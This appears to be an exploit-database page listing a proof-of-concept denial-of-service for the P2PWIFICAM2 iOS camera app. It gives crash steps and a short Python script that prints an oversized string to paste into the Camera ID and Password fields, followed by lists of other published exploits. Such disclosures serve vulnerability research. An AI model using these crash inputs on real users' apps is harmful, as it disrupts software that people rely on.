Menu

Search for hundreds of thousands of exploits

"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)"

Author

Exploit author

"Ivan Marmolejo"

Platform

Exploit platform

ios

Release date

Exploit published date

2020-02-03

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-02-02
# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
# Software Link: App Store for iOS devices
# Tested Version: 10.4.1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3

# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software.
# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex, 
# truly plug and play!

# Steps to Produce the Crash:

# 1.- Run python code: P2PWIFICAM.py
# 2.- Copy content to clipboard
# 3.- Open "P2PWIFICAM" for Ios
# 4.- Go to "Add" (Touch here to add a camera)
# 5.- Go to "Input Camera"
# 6.- Paste Clipboard on "Camera ID" 
# 7.- Paste Clipboard on "Password" 
# 9.- Ok
# 10- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-02-03"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2019-11-28"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2019-11-26"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2019-11-20"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd"dosios"Google Security Research"
2019-11-19"scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)"dosios"Luis Martínez"
2019-11-18"Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)"dosios"Luis Martínez"
2019-11-11"iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)"dosios"Sem Voigtlander"
2019-09-24"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds"dosios"Google Security Research"
2019-05-23"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free"dosios"Google Security Research"
2019-05-06"iOS 12.1.3 - 'cfprefsd' Memory Corruption"dosiosZecOps
2018-11-06"FaceTime - RTP Video Processing Heap Corruption"dosios"Google Security Research"
2018-10-22"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value"dosios"Google Security Research"
2018-10-22"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas"dosios"Google Security Research"
2018-09-03"Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)"dosios"Luis Martínez"
2018-09-03"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)"dosios"Luis Martínez"
2018-08-29"Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)"dosios"Luis Martínez"
2018-08-27"Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)"dosios"Luis Martínez"
2018-06-05"WebKit - not_number defineProperties UAF (Metasploit)"remoteiosMetasploit
2018-05-16"WhatsApp 2.18.31 - Memory Corruption"dosios"Juan Sacco"
2018-01-08"Photos in Wifi 1.0.1 - Path Traversal"webappsiosVulnerability-Lab
2017-11-20"iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service"dosios"Russian Otter"
2017-11-01"WhatsApp 2.17.52 - Memory Corruption"dosios"Juan Sacco"
2017-10-17"Apple iOS 10.2 (14C92) - Remote Code Execution"remoteios"Google Security Research"
2017-09-25"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response"remoteios"Google Security Research"
2017-08-26"Apple iOS < 10.3.1 - Kernel"localios"Zimperium zLabs Team"
2017-05-17"Apple iOS < 10.3.2 - Notifications API Denial of Service"dosiosCoffeeBreakers
2017-02-21"Lock Photos Album&Videos Safe 4.3 - Directory Traversal"webappsiosVulnerability-Lab
2017-02-20"Album Lock 4.0 iOS - Directory Traversal"webappsiosVulnerability-Lab
2016-12-12"iOS 10.1.x - Certificate File Memory Corruption"dosios"Maksymilian Arciemowicz"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47993/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse